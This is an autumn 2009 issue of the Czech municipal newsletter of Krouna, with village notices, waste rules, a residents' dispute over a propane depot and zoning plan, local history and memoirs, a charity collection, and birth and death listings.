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Obecní úřad informuje 
 

* Starosta obce děkuje jménem zastupitelstva obce Krouna 

všem, kteří se podíleli na přípravě a zdárném průběhu oslav 660. 
výročí první písemné zmínky o obci Krouna, 125. výročí 

zaloţení SDH Krouna a 50. výročí zahájení řádné výuky v nové 

budově ZŠ Krouna. Poděkování patří také pánům farářům za 
provedení církevních aktů v rámci oslav, hasičům a dalším 

občanům za úsilí při stavbě garáţe pro novou hasičskou cisternu 

a všem občanům, kteří se v hojném počtu oslav zúčastnili. 
* Váţení spoluobčané, děkuji Vám všem, kteří jste v průběhu 

roku 2009 udrţovali s péčí řádného hospodáře své nemovitosti a 

jejich okolí. Poděkování patří také Vám, kteří jste bez ohledu na odměnu 

pečovali i o veřejné prostranství v okolí vašeho domu. 
Zaměstnancům obce  i pracovníkům ÚP  pracujícím v údrţbě děkuji za úsilí  

vynaloţené nejen  při sekání trávy na veřejných prostranstvích v obcích, ale také 

při vykonávání všech dalších úkolů.  Mgr. Pavel Ondra, starosta obce 
* Váţení  spoluobčané, 

k odkládání odpadů ke  kontejnerům 

 pro svoz odpadů pouţívejte černé pytle 

s označením „Technické sluţby Hlinsko, 
s.r.o.“. 

Pokud odloţíte ke kontejnerům odpad 

v tenkých a často porušených  a 
nezavázaných pytlích, je velmi obtíţné pro 

posádku takový odpad nakládat. O obsah 

pytlů se posádka velmi často zraní. Obsah 
pytlů se vysypává a posádka vozů nemůţe 

 naší vinou provést dokonale svoz!!! S TS Hlinsko (= firma provádějící svoz) 

platí dohoda, ţe nadbytečné odpady  budou sváţeny v pevných, označených a 

zavázaných pytlích. 
Do svozových  nádob ukládejte jen určený materiál. Je velmi drahý luxus, 

abychom z vesnice vyváţeli organický materiál z našich pozemků (větve, listí, 

shrabky trávy, spadané ovoce,…) a draze potom nakupovali a dováţeli zpět 
zeminu  pro naše zahrádky. Organický materiál můţeme  na vesnici téměř 

všichni snadno účelně zkompostovat a ušetřit nemalé peníze sobě i obci. 

Prosím Vás proto o dodrţení tohoto postupu, který nám všem pomůţe. Pytle 

pro tento účel prodává p. Sodomková v kanceláři OÚ. 
* Spolek přátel historie Vysočiny srdečně zve na další setkání v Krouně 

s tématem Čtení historie z krajiny. Setkání se uskuteční v sobotu 24. října 

2009 ve 13:00 hodin v sále v podkroví ZŠ Krouna. Na programu jsou 
pracovní beseda o geologii našeho regionu (přednášet budou Ing. Marek 
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Čáslavský a Ing. Jan Ptáček) a geologie v praxi (pracovní výjezd auty na 
vybraná zajímavá místa – Krouna – Hápova skála, údolí Kablaně, lom 

Rychmburk, Doly – řečiště Krounky, Košumberk, lom na horní Krouně; vše 

podle časových a světelných podmínek). Občerstvení je zajištěno. 
* Výlov rybníka Krouna velká, spojený s prodejem ryb na hrázi, se uskuteční 

v pátek 23. října 2009 od 9:00 do11:00 hodin. 

* Diakonie Broumov děkuje našim občanům za poskytnutou humanitární 

pomoc. 
 

Odpověď na žádost obce Krouna o zlepšení dopravní 
obslužnosti na trase Polička – Žďárec u Skutče 

 
Dobrý den, 

obdrţeli jsme Vaše připomínky k Návrhu JŘ ČD 2009/2010. Poţadujete 

rozšíření provozu vlaku Os 15352 (z Krouny odjíţdí v 15:30 hod. do Ţďárce – 

pozn. redakce) na víkendový provoz a prodlouţení trasy vlaku Os 15360 (jede 
ve všední den v  11:11 hod. z Poličky na Čachnov – pozn. redakce) do Ţďárce u 

Skutče. 

Tyto připomínky jsme projednali se zástupci KCOD ČD Pardubice a došli 
jsme ke společnému závěru, ţe Vaše poţadavky nejsou podloţeny poptávkou 

cestujících. 

V současném JŘ ČD jede vlak Os 15342 (ekvivalent Os 15352) téţ v sobotu 

a sčítání cestujících prokázalo nezájem cestujících o tento vlak. Není tedy 
ekonomicky obhajitelné tento vlak nadále v sobotu provozovat nebo jeho provoz 

rozšiřovat na neděli. 

V podstatě totoţná je situace u vlaku Os 15360, který je jiţ v letošním roce 
provozován pouze do Čachnova. Tento vlak jede v čase dopoledního sedla, kdy 

je poptávka po dopravě velice malá. Současná ekonomická situace nám bohuţel 

neumoţňuje rozšiřovat objednávku ţelezniční dopravy v časech, kdy o ni není 
dostatečný zájem mezi cestujícími.  

Věřím, ţe našim argumentům rozumíte a na veřejnou dopravu nezanevřete.  

  

S pozdravem 
 Ing. Roman Tesař, 

oddělení dopravní obsluţnosti 

Krajský úřad Pardubického kraje 
Komenského náměstí 125 

532 11 Pardubice 

tel: 466026366 
e-mail: roman.tesar@pardubickykraj.cz 

 

mailto:roman.tesar@pardubickykraj.cz
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Obecní úřad Krouna 
53943 Krouna 218 

tel. fax. 469341130, e-mail:obec@krouna.cz, 

epodatelna@krouna.cz, web: www. krouna.cz 

 
Číslo jednací: 1088/09  V Krouně dne 15. 9. 2009 

Vyřizuje: I. Teplá 

 
Informace o zahájení zjišťovacího řízení k záměru zařazenému v kategorii II 

„Hlinsko - Polička, vedení 110 kV“  

 

Ministerstvo ţivotního prostředí České republiky, pobočka Hradec Králové, 
ing. Miloslav Kozák, Resslova 1229/2a, 500 02 Hradec Králové jako příslušný 

úřad sděluje, ţe záměr 

"Hlinsko - Polička, vedení 110 kV" 
podle § 6 odst. 3 zákona č. 100/2001 Sb., o posuzování vlivů na ţivotní 

prostředí a o změně některých souvisejících zákonů (zákon o posuzování vlivů 

na ţivotní prostředí), ve znění pozdějších předpisů bude podroben zjišťovacímu 
řízení podle § 7 tohoto zákona. 

Do oznámení podle přílohy č. 3 k zákonu č. 100/2001 Sb., o posuzování 

vlivů na ţivotní prostředí a o změně některých souvisejících zákonů (zákon o 

posuzování vlivů na ţivotní prostředí), ve znění pozdějších předpisů, záměru 
"Hlinsko - Polička, vedení 110 kV" je moţné nahlíţet v úředních hodinách na 

Obecním úřadě v Krouně u pí. I. Teplé, tj. v době PO, ST   7.30 - 16.00 hod., 

ÚT, ČT, PÁ 7.30 - 12.00 hod. 
Kaţdý můţe zaslat své písemné vyjádření k oznámení příslušnému úřadu do 

20 dnů ode dne zveřejnění informace o oznámení na úřední desce dotčeného 

kraje. 
                                                               Pavel Ondra, starosta obce Krouna 

 
 

Vyjádření Občanského sdružení občanů a přátel Čachnova 
k územnímu plánu obce Krouna 

 

Váţení spoluobčané, 
v pondělí 14. 9. 2009  schválilo zastupitelstvo při veřejném zasedání Územní 

plán obce Krouna a spádových obcí, včetně naší obce Čachnov, se kterým v jedné 

jeho části nesouhlasíme, a proto se budeme  odvolávat. Víme, ţe někteří z vás čekají 

na nový ÚP, např. mladí lidé, kteří chtějí stavět, proto povaţujeme za nutné své 

jednání vysvětlit. 
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Od nádraţí směrem k obytným domům se nachází manipul. plocha celá 

desetiletí určená k manipulaci a skladování dřeva. Od března loňského roku se 

bráníme záměru spol. Pronto Gas s r.o. /který zastupitelstvo bez zjevných výhrad 

podporuje/ vybudovat zde sklad Propan-Butanu s plnírnou PB lahví o celkové 

kapacitě 150 tun tohoto plynu, nebo chcete-li 285000 litrů stlačeného plynu. Je to 

plyn vysoce hořlavý, výbušný – kdyby vybuchl celý sklad, bude zničen, nebo 

poničen celý Čachnov + některé části v obci Pustá Kamenice. To je prostě fakt, 

který se nedá zpochybnit. Kaţdý občan, který nám nevěří, má právo vyţádat si na 

OÚ Krouna k nahlédnutí Analýzu bezpečnosti a rizik, vypracovanou f. Pronto Gas 

k danému záměru, a přesvědčit se, příp. pouţít internet, literaturu o vlastnostech PB 

atd. V Analýze je spousta buď zatajených, nebo nepravdivých faktů /např. silnice 

jsou uvedeny 70 m od man. plochy. Kdo zná Čachnov, ví, ţe tuto plochu silnice 

lemují. Naše nejbliţší domy jsou hned za silnicí, ani toto se neuvádí a i tak je to 

hrůza. Prostě jde o naše ţivoty a majetky i o ţivoty vaše, pokud jezdíte vlakem nebo 

po čachnovských silnicích. I malá nehoda PB můţe spustit katastrofu, poněvadţ 

vodní nádrţ nacházející se pod manipul. plochou o obsahu 150 m3 by nestačila ani 

na chlazení tlakových zásobníků. V zimě by nebyla ani ta. Jiný pouţitelný zdroj 

vody ani vodovod v Čachnově nejsou. Firma nabízela 7 pracovních míst, dnes uvádí 

3 místa – lze se přesvědčit opět na OÚ v dokumentech firmy. 

Dne 7. 3. 2008 byla na OÚ zaslána petice čachnovských občanů 

s nesouhlasnými vyjádřeními k tomuto záměru. 

Dne 14. 5. 2008 na jednání se zastupiteli OÚ, jednateli Pronto Gas a občany 

Čachnova i Krouny byl opět vyjádřen protest se záměrem a to ještě firma neměla 

areál zakoupen!! 

Od té doby se stále jen bráníme, podáváme odvolání a návrhy k řešení situace. 

/Jedním z prvních návrhů bylo odkoupit manipul. plochu obcí a zřídit zde náves i na 

posílení cestovního ruchu – lavičky, parkoviště, hřiště atd. Minulý majitel f. Forest 

Svitavy prodávala celý areál i s budovou za 3 200 000 Kč. Za cca 3 roky, kdy o 

koupi nikdo nestál, šla cena nejspíš dolů, protoţe na jaře r. 2008 na náš dotaz u f. 

Forest, proč plochu prodávají zrovna plynařům, nám bylo sděleno, ţe jsou rádi, ţe to 

někdo koupil – v budově jiţ bylo popraskané ústř. topení, voda, zatékalo. Takţe 

man. plocha zpevněná a odvodněná, rozm. cca 60 x 80m by mohla mít cenu cca 

jeden milion korun/. 

Se záměrem by nepřibyla ani koruna do obecní pokladny, poněvadţ firma má 

sídlo ve Vysokém Mýtě. 

Naštěstí nás před nimi chrání stávající ÚP, kde je plocha vedena jako prům. 

zóna pro dřevozpracující průmysl. Jako výjimečně přípustná z chemických látek je 

čerpací stanice pohonných hmot, lze se přesvědčit opět na OÚ. Územní plán má 

velkou moc i před vlastnickými právy. 

Dále nás před bezohledným souhlasem našich zastupitelů chrání Energetický 

zákon 458/2004 Sb. a jeho bezpečnostní pásma tlak. zásobníků a plnírny. V případě 

uskutečnění záměru by sahala aţ za naše domy, coţ bez našich souhlasů nelze. 

Kdyby těchto nebylo, dnes jiţ sklad stojí.  



www.krouna.cz  Krounský zpravodaj 

 

-6- 

V konceptu nového ÚP byla sporná plocha ještě vedena jako VX – plochy 

výroby a skladování související s lesnictvím a dřevovýrobou /piliny jsme mívali 

všude, ale nic proti tomu/. 

V návrhu nového ÚP je plocha jiţ vedena jako VK – plochy skladování; pro 

skladové areály bez výrobních činností – bez jakékoliv uţší specifikace!!, a tak byl 

přes naše protesty a kompromisní návrhy také ÚP schválen, bez toho, aby se vyřešil 

rozpor /zák. 183/2006, § 53/. (Je to trest za to, ţe se bráníme plynu?) Náš poslední 

ústní návrh před samotným hlasováním v pondělí dne 14. 9. 2009 byl vsunout ke 

stávajícímu ÚP do nepřípustného funkčního vyuţití 4 slova: chemický, odpadový a 

uhelný průmysl – to není v rozporu se stávajícími stanovisky dotčených orgánů. 

Stačila ještě před schválením dohoda, ÚP by se minim. upravil, to zákon umoţňuje a 

do cca 3 měsíců mohl být schválen. Na jaře se mohlo stavět. 

Věříme, ţe uznáte, váţení spoluobčané, ţe se stávajícím – VK - nelze souhlasit, 

protoţe pak by se zde dalo skladovat cokoliv i plyn, odpady, včetně třeba i 

radioaktivních. Byli bychom odkázáni na benevolenci zastupitelů současných i 

budoucích, a jak píšeme výše, v neustálém ohroţení ţivota a zdraví. Po našich 

zkušenostech se zastupiteli i dotčenými orgány, kteří nedávají záruky, ţe by se tak 

nestalo, by tak učinil pouze sebevrah. Našim zastupitelům jsou naše ţivoty 

lhostejné, jinak by nehlasovali tak, jak hlasovali, přestoţe při nástupu do funkcí 

skládali slib: Na svou čest a svědomí – v zájmu obce, jejich občanů, řídit se zákony 

a ústavou – zákon o obcích /zkrácená forma/. 

 

Za stávající situace je moţné, ţe se ÚP posune o rok, o dva i o deset let, 

poněvadţ jsme odhodláni jít k soudům. Nic jiného nezbývá, jde nám o ţivoty. 

 

Děkujeme za pochopení. 

 
V Čachnově dne 22. září 2009 

Za OS-OPČ  členka výboru Jindřiška Sáblíková 

 
 

Výzva ke kácení a okleštění stromoví a jiných porostů 
 

Váţená zákaznice, váţený zákazníku, 

dovolujeme si Vás poţádat o pokácení a okleštění stromoví a 
jiných porostů v blízkosti elektrických rozvodných zařízení. 

 

Okleštění dřevin proveďte prosím v termínu od 1. října do 15. listopadu. 

 
Důvodem je zabezpečení provozu rozvodného zařízení, zajištění 

bezpečnosti osob, kvalitní dodávky elektřiny a sníţení ztrát v sítích na základě 

zákona č. 458/2000 Sb., energetický zákon a zákona č. 114/1992 Sb., o ochraně 
přírody a krajiny, v platném znění. 
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Okleštění (ořez) dřevin prosím provádějte tak, aby: 

 nejmenší vzdálenost větví od vodičů nízkého napětí u ovocných stromů 

byla alespoň 1 m u holých vodičů; 0,5 m u izolovaného a kabelového 

vedení; u lesních a ostatních stromů 0,5 m u holého, izolovaného 

i kabelového vedení s uvaţováním ročního přírůstku, 

 v ochranném pásmu vedení vysokého napětí, tj. pod vedením a 7 m na 

kaţdou stranu od krajních vodičů, dosahovaly porosty maximální výšky 

3 m a minimální vzdálenost větví od vodičů u ovocných stromů byla 2,1 m 

u holých vodičů, 1,5 m u izolovaného vedení a 0,5 m u kabelového 

vedení; u lesních a ostatních stromů 0,6 m u holého vedení a 0,5 m u 
izolovaného a kabelového vedení s uvaţováním ročního přírůstku, 

 v ochranném pásmu vedení 110 kV, tj. pod vedením a 12 m na kaţdou 

stranu od krajních vodičů dosahovaly porosty maximální výšky 3 m. 

 
Při práci prosím dodrţujte bezpečné vzdálenosti od vodičů pod napětím dle 

ČSN EN 501 10-1 ed. 2. Odstraňování stromoví, při kterém by mohla být 

ohroţena bezpečnost a funkčnost vedení, provádějte pouze se souhlasem 

společnosti ČEZ Distribuční sluţby, s.r.o. 
Pokud nedodrţíte uvedený termín, provede okleštění, případně odstranění 

dřevin společnost ČEZ Distribuční sluţby, s.r.o. 

 
Děkujeme Vám za spolupráci. 

 
 

Třídění odpadů pomáhá recyklaci! 
 
Kaţdý z nás vyhodí za rok v průměru 150 - 200 kg 

odpadů.  Jednoduchým výpočtem lze tedy zjistit, ţe je to půl 

kilogramu odpadů na jednoho člověka za jeden den. Zdá se 
vám to málo?  

Na konci června letošního roku ţilo v České republice 

téměř deset a půl milionu obyvatel. Pokud by skutečně kaţdý 
člověk vyhodil půl kilogramu odpadů - za jediný den je to přes 5 tisíc tun. A za 

rok? Téměř 2 miliony tun odpadů. Přitom pokud doma odpad třídíte, umoţníte 

tak recyklaci více neţ třetiny tohoto mnoţství. 

Jaký je obsah běţné popelnice?  
22% z odpadu tvoří papír, 13% zabírají plasty, 9% sklo a 3% nebezpečný 

odpad. Bioodpadu vyprodukujeme 18%, ostatního odpadu zbývá 35%.  Ten, kdo 

vyuţívá barevné kontejnery, můţe za rok vytřídit aţ 30 kg papíru, 25 kg plastů a 
15 kg skla.  
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„Lidé, kteří správně třídí odpad, umožňují jeho další zpracování. Odpady 
z barevných kontejnerů jsou následně odváženy na dotřiďovací linky. Na těchto 

linkách se odpady zbavují nečistot a dále třídí podle jednotlivých druhů. 

Z dotřiďovacích linek jsou odpady převáženy do zpracovatelských závodů, kde 
se odpady používají při výrobě nových výrobků,“ upřesnil Tomáš Pešek, 

regionální manaţer společnosti EKO-KOM, zabývající se tříděním a recyklací 

odpadu. 

 
Další informace o třídění odpadů najdete na webové adrese 

www.ekontejnery.cz . 

Kontakt:  

Tomáš Pešek, regionální manaţer EKO-KOM, a.s. 

Tel.: 721 562 554, e-mail.: pesek@ekokom.cz 

 
 
 

Putovní výstava fotografií z míst Pardubického kraje 
 
Plavecký bazén v Hlinsku bude od 19. 10. do 

25. 10. 2009 jedním z jedenácti míst 
Pardubického kraje, který bude hostit putovní 

fotografickou výstavu. Výstavu bude tvořit 

celkem 15 fotografií, které vybere odborná komise a slavnostně je představí na 
začátku října v pardubickém Klubu 29. Výstava navazuje na fotografickou 

soutěţ Destinační společnosti Východní Čechy. 

„Pardubický kraj disponuje celou řadou zajímavých míst a příležitostí pro 
šikovné fotografy. Byla by škoda, kdyby povedené fotografie zůstaly jen 

v rodinných albech a v počítačích fotografů. Nejlepší fotografie přece nevznikají 

aranžovaně, ale díky náhodě a rychlému postřehu. Proto jsme vyhlásili 

fotografickou soutěž pro amatéry i profesionály, do které bylo zasláno mnoho 
zajímavých fotografií,“ vysvětlil Miroslav Stejskal, člen Rady Pardubického 

kraje odpovědný za cestovní ruch. 

Destinační společnost Východní Čechy vyhlásila fotografickou soutěţ 
zaměřenou na zajímavá místa Pardubického kraje v srpnu. Soutěţící zaslali přes 

300 fotografií, ze kterých odborná komise v nejbliţších dnech vybere patnáct 

nejlepších snímků. Autoři snímků budou ohodnoceni a fotografie umístěny na 
putovní výstavě po místech Pardubického kraje. 

Putovní výstava fotografií je součástí projektu Destinační společnosti 

Východní Čechy, který je spolufinancován z regionálního operačního programu 

NUTS II Severovýchod. 
 

http://www.ekontejnery.cz/
mailto:pesek@ekokom.cz
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Seznam míst Pardubického kraje, kde se výstava uskuteční: 
Pardubice  5. 10. - 11. 10. 2009 Klub 29 

Chrudim  12. 10. - 18. 10. 2009 Informační centrum 

Hlinsko  19. 10. - 25. 10. 2009 Plavecký bazén 

Heřmanův Městec 26. 10. - 1. 11. 2009 Informační centrum 

Svitavy  2. 11. - 8. 11. 2009 Kulturní centrum Fabrika 

Moravská Třebová 9. 11. - 15. 11. 2009 Městský úřad 

Ústí nad Orlicí 16. 11. - 22. 11. 2009 Červený kříţ 

Litomyšl  23. 11. - 29. 11. 2009 Zámecké informační centrum 

Vysoké Mýto 30. 11. - 6. 12. 2009 VOŠ a SŠ stavební 

Skuteč  7. 12. - 13. 12. 2009 Muzeum obuvi a kamene 

Holice  14. 12. - 20. 12. 2009 Kulturní dům 

 
Kontakt: 

Leoš Malina 

e-mail: l.malina@vychodnicechy.info 

tel.: 725 058 466 
 

 

Krouna ve stínu leteckých tras 
 

Jako se pozemní doprava provozuje mj. po silnicích, z nichţ kaţdá má své 

označení, tak se i letecká doprava vede po trasách, které jsou na leteckých 
mapách označeny písmeny a čísly. 

K nejfrekventovanějším v naší oblasti patří trať UM748 s převahou 

jednosměrného pohybu letadel od Poděbrad přes Heřmanův Městec a Ţdírec nad 
Doubravou k Brnu. Pokud se letadla z různých důvodů (zvl. meteorologických) 

odchýlí od této mapové trasy, můţeme směrem od Hlinska na Svratku vidět i 

letadla běţně se pohybující ve větší vzdálenosti od Krouny. Jedná se o trať 

spojující aţ na výjimky především některá evropská města. Nejčastějším místem 
odletu je nizozemský Amsterdam, dále pak německá města Hannover, Berlín, 

Lipsko a Hamburk, britský Manchester a v menší míře např. švédský Stockholm 

či irský Dublin. Spoje směřují do jihoevropských destinací a některých 
evropských hlavních měst. Nejčastěji tyto lety končí v Budapešti a Vídni a dále 

ve známých letoviscích, jako např. turecká Antalya, Dalaman a Bodrun, řecké 

Thessaloniki (Soluň) a Heraklion, egyptská Hurghada. Několik zámořských 
linek této trasy vede z New Yorku, Washingtonu a Toronta do Budapešti. 

Převládajícími typy strojů na trati UM748 jsou Boeing 737-800 a Airbus A-320. 

Nejblíţe Krouně vede trasa UP41 protínající území např. Chlumce nad 

Cidlinou, Chrudimi a Ţďárce u Skutče směrem na Rychnov, Telecí a Blansko. Z 
některých severských měst (Oslo, Kodaň, švédský Gothenburg nedaleko 

Göteborgu) směřují letadla do Bratislavy, Budapešti, Antalye, řeckých Athén a 
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Heraklionu, dále z anglického Manchestru do kyperské Larnaky nebo z Berlína 
do libanonského Bejrútu. Zámořskou trasu zde absolvují velkokapacitní 

čtyřmotorové Airbusy A-340 z Istanbulu do Chicaga. 

Na obou tratích lze sledovat přelety v horní letové hladině (tj. ve výškách 
zhruba od 7,5 km výše). Stroje se pohybují průměrnou rychlostí kolem 750 

km/hod., průměrná výška je kolem 10,5 km. Ze stručného přehledu můţeme 

usoudit, ţe nebe nad Krounou a v její blízkosti je po dopravní stránce poměrně 

frekventované a vskutku mezinárodní. 
 

Libor Nekvinda 
 
 

 

 
Zvon pro prvňáčky 

 
Proč jsem dal dětem z první třídy zvon? 

1) Obec Krouna slaví 660 let od první písemné zmínky. 

2) V budově školy  se učí uţ 50 let. 
3) A hlavně - všichni potřebujeme trochu štěstí k ţivotu. 

Lze však říci, ţe my to štěstí máme. Stačí se 

podívat trochu do světa či sledovat pozorně 

zprávy a rychle a snadno to zjistíme: 
- Ţijeme v míru. 

- Máme kde spát. 

- Nemáme hlad. 
- Máme vodu. 

- Máme svobodu vyznání. 

- Máme svůj domov a zemi, kde nás mají 
rádi. 

Zdá se to jako fráze, ale v převáţné části  světa tento stav není!!!! 

Proto ať našim prvňáčkům zvon  přinese trvalé a pevné štěstí nejen ve škole, 

ale i v celém jejich dalším ţivotě. 
  

Pavel Ondra 

 
 
 
 
 
 



www.krouna.cz  Krounský zpravodaj 

 

-11- 

Vzpomínka na školní léta 
 

Moji milí spoluţáci, 

rok rychle utekl a my se opět sešli. Abychom si tyto vzácné chvíle zpestřili, 
píšu několik střípků a trapasů z dob dětství ve škole. Ty dávné doby si velice 

ţivě pamatuji. Co bylo včera, je uţ horší. 

Nejprve připomenu opět svého oblíbence, pana ředitele Věrteláře. Vešel 
s úsměvem do třídy a vţdy něco humorného pronesl. Celá třída burácela smíchy. 

A on pronesl větu: „Děti, den, kdy jsme se nezasmáli, je ztracený. A my se 

zasmáli, tak se teď budeme učit.“ 
Do školy s námi chodila děvčata a chlapci z Kladna, Ovčína, Mířetína, 

Otradova, Rychnova, Dědové, Čachnova, Oldřiše a František. Mám ty podoby 

vryté do paměti. Vlastu Ryšavou a ten její přísný pohled. Lidušku Nekvindovou, 

říkali jsme jí Liduška, protoţe byla hodná. Kudrnaté vlasy a stále se smějící 
děvčátko. Z Ovčína to byla dvojice – Lidka Broţková a Anička Popelková. 

Kluci, no to prostě byli kluci. Zlobili. Po nich jsem tak nekoukala, jen jsem jim 

tiše záviděla, kdyţ vyprávěli a chlubili se, jak se měli na chmelu. O kaţdém 
z Vás by se dalo něco napsat. Věřím, ţe by to bylo zajímavé. 

Jednoho dne, kdyţ jsem jela do školy, mě zastavil pan řídící Balous 

z Kamenice a pravil, zda bych mu nedala spravit boty u pana Mlynáře. Já velice 

ochotně přisvědčila. No, aby ne. Pan řídící mě ţádá, to byla pro mne čest. No a 
jedu. Tenkrát na vypůjčeném kole. Později mi ho někdo ukradl. Dodneška si 

neumím vysvětlit, ţe jsem jednala tak, jak jednala. Dohonila jsem spoluţačku – 

Lídu Zrůstovou. Povídám jí: „Máš dát panu řídícímu spravit boty.“ Myslela 
jsem, ţe bude štěstím bez sebe. Ale Lída ne. Nechtěla tomu rozumět. Ţe je dal 

mně, tak ať si je tam zanesu sama. Seděla v první lavici a já jí ty boty v síťové 

tašce poloţila opatrně k nohám. Ona je chytla a dala je mně do poslední lavice. 
Já zase zpátky a to se dělo několikrát, neţ si toho všiml pan učitel Sodomka. 

Měli jsme dějepis. Vyprávěl o Sokratovi. To mě zajímalo. Ale ty boty mě 

rozptylovaly. Zeptal se, čí jsou to boty. Sváděly jsme to jedna na druhou. Lída 

ale byla samozřejmě v právu. Pan učitel povídá: „Kdyţ ničí, tak ničí.“ A milé 
boty hodil s tou síťovou taškou z okna dolů. To ve mně hrklo. Ale pan učitel se 

jistil, poslal pro ně Frantu Šedivého, musel to být ţák s charakterem, aby je dal 

do ředitelny. O přestávce jsme s Lídou svorně s prosíkem šly pro ně. Dokonce 
jsme je po škole spolu zanesly panu Mlynářovi. Ten jistě netušil, jaké vzácné 

boty ţe to spravuje. Zkrátka – ve dvou se to lépe táhne. Pro mne to bylo velké 

ponaučení. A dnes? Kdyţ se s Lídou náhodně potkám v Poličce, vţdy si to 

připomeneme a obě se od srdce zasmějeme. 
    Potom zase jednou v zimě – všude, kam oči pohlédly – sníh. Měli jsme 

vyučování do tří hodin. A to uţ se trochu stmívalo. Šla jsem domů s Máňou 

Černou. Byly jsme nerozlučné kamarádky. V Koutech jsme se rozhodly, ţe 
půjdeme uráţkou. Říkalo se „Roušmírnou“. Vtom Máňa zjistila, ţe jí chybí 
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jedna rukavice. Já neměla ţádné. Zima mně nebyla. Hledala jsem s ní, ale 
rukavice nikde. Dodnes tu rukavici vidím. Zelená se ţlutými nitkami. Máňa 

plakala. Bála se jít domů. Já ji utěšovala, ale rukavici jsem vyčarovat neuměla. 

Na noc k nám Máňa nepřišla, tak to doma dopadlo dobře. 
Na jaře se objevila mezi dětmi ţloutenka. Nikdo mně nic nevysvětlil a já to 

chápala jako součást ţivota. Ráno, jako vţdy, jsem se stavila pro Máňu. Dál 

jsem nešla. Měli nízko okna a v nich plno muškátů. Maminka Máni se mě ptá: 

„Máš ţloutenku?“ „Já nevím,“ povídám. „Ukaţ nohy!“ A protoţe ta okna byla 
nízko, zvedla jsem nohu a dala se tak vyhlášenému lékaři prohlédnout. Povídá: 

„Máš ţlutou nohu, máš ţloutenku.“ Dietu jsme měli celý rok, a tak usuzuji, ţe to 

bylo dobře. Ale kdyţ se mě lékaři ptají, jestli jsem prodělala ţloutenku, já to 
dodneška nevím. 

Na těch cestách domů bylo mnoho záţitků. Jednou nás honil Franta 

Halamků z Čachnova a Rychnováci. Franta na nás křičel: „Končetiny, 

končetiny!“ My jsme nevěděly, co to znamená. On asi také ne. Domnívaly jsme 
se, ţe je to něco škaredého, a tak jsme příšerně utíkaly. Aţ schváceně. Ale o 

Frantovi jen to dobré. Byl to správný kluk a kamarád. 

Pamatuji a vzpomínám téţ na Aničku Praţanovou z Otradova. Postavila se 
před mou lavici. Násadu od pera v ruce, brýle, vzpřímený postoj a pravila 

zvýšeným hlasem: „Tady bude ticho!“ To jsem se hodně skrčila. Na ty krásné 

roky nám zbyly jen vzpomínky. 
Jeden trapas jsem zaţila při ruštině. Paní učitelka Hejtmánková prohlásila, 

ţe si zazpíváme. Děti křičely: „Halamková umí písničku!“ Já jsem se bránila. To 

nás většinou učitelé jmenovali příjmením, a kluci na nás dokonce volali 

„ďouče“. Paní učitelka Věrtelářová to nerada slyšela. Říkala nám dívky a 
mládenci. Byla to atraktivní dáma. No ale k tomu zpěvu. Věděla jsem, ţe to 

nedopadne dobře. Na pokyn jsem se postavila v lavici a začala pět: „Komandýr 

geroj, geroj Čapájev.“ Jediný pohled na paní učitelku mně stačil. Ona velice 
dobře zpívala a hrála na housle. Udělala rukou gesto. A já, v domnění, ţe mě 

bude dirigovat, uţ jsem chtěla znovu začít. „Dost! To stačí! Sednout!“ Sedla 

jsem si. A ráda. Krve by se ve mně nedořezal. Tak skončilo mé slavné neslavné 
zpívání. Domů jsem šla raději sama. Myslela jsem, ţe to poníţení nepřeţiju. 

Nikoho jsem nechtěla ani viděl. Paní učitelku jsem měla ráda a hodně mě 

mrzelo, ţe zrovna před ní to dopadlo tak, jak dopadlo. Potřebovala jsem se 

někomu doma svěřit. Ale doma byl jen tatínek. Četl jako vţdy a moje úlety ho 
nezajímaly. To čtení jsem po něm zdědila. Bratr slouţil vlasti. Maminka slouţila 

u sedláků, jak to dřív bylo normální. Já jsem maminku milovala. Přišla domů 

unavená. Bylo mně jí líto. Myla si ve škopíčku nohy a usínala únavou. Bylo uţ 
pozdě večer a něco jí říkat, to nešlo. A tak jsem to přeţila a dnes na to 

s úsměvem vzpomínám. Na ruštinu jsem nezanevřela. Dokonce to byl můj 

oblíbený předmět. Paní učitelka Hejtmánková učila v Poličce v důchodu i mého 
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syna Josefa. Dokonce jsme si o rodičáku promluvily. Ale Pepík uţ jí nezazpíval. 
Neměl uţ odvahu.  

„MLÁDÍ, TO JE NEJKRÁSNĚJŠÍ ŠŤĚSTÍ.“ To ne já, to Karel Valdauf. Já 

dodávám: „ALE I STÁŘÍ MÁ SVÉ KOUZLO.“ 
 

Ludmila Pešková roz. Halamková, září 2009   

 

   
Občanské sdružení Diakonie Broumov je nezisková organizace, která poskytuje 

sociální služby pro občany z okraje společnosti – materiální pomoc sociálně 

potřebným, azylové ubytování i pracovní příležitost. 
Více na www.diakoniebroumov.org 

 

DIAKONIE BROUMOV VYHLAŠUJE 
 

H U M A N I T Á R N Í     S B Í R K U 
 

 Letního a zimního oblečení /dámské, pánské, dětské/ 
 Lůţkovin, prostěradel, ručníků, utěrek, záclon  

 Látky (minimálně 1m
2
, prosíme, nedávejte nám odřezky a zbytky látek) 

 Domácí potřeby - nádobí bílé i černé, skleničky - vše nepoškozené 
 Peří, péřových a vatovaných přikrývek, polštářů a dek 

 Obuv – veškerou nepoškozenou 
 

VĚCI, KTERÉ VZÍT NEMŮŽEME: 

 ledničky, televize, počítače a jinou elektroniku, matrace, koberce – 

z ekologických důvodů 

 nábytek, jízdní kola a dětské kočárky - ty se transportem znehodnotí 

 znečištěný a vlhký textil 
 

Sbírka se uskuteční: 

dne: 16. 9. - 16. 10. 2009 
čas: PO, ST 7.30 - 16.00 hod. 

                  ÚT, ČT, PÁ 7.30 - 12.00 hod. 

místo: Obecní úřad Krouna, přízemí, rohová místnost proti knihovně 
 

Věci prosíme zabalené do igelitových pytlů či krabic, 

aby se nepoškodily transportem. 
 

Děkujeme za Vaši pomoc. 
 

Bliţší informace Vám rádi sdělíme: 

tel.: 224 316 800, 224 317 203 
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SPOLEČENSKÁ RUBRIKA 
Výročí: 

Červenec Srpen 

65 let – Nadrchalová Marta 65 let – Bárta Josef 

 – Zelenková Zdeňka 75 let – Jirásková Dagmar 

70 let – Vtípilová Marie 80 let – Gregor Josef 

 – Boušková Alena 85 let – Kyncl František 

85 let – Nekvindová Marta 94 let – Sodomková Marie 

 – Marini Marie    

 

 

 

 

 

 

 

 

 

Narození: 
Červen Červenec 

Nekvindová Nela Bukáček Petr 

Koudelková Michaela  

  
Srpen  

Šebková Lucie  

 

Úmrtí: 
Červen Červenec 

Vostřelová Blaţena Černá Vlasta 

 Kučera Bohumil 

  

Srpen Září 

Boušková Vlasta Kusý Jaroslav 

 
 

 

 
 

 

 

Září   

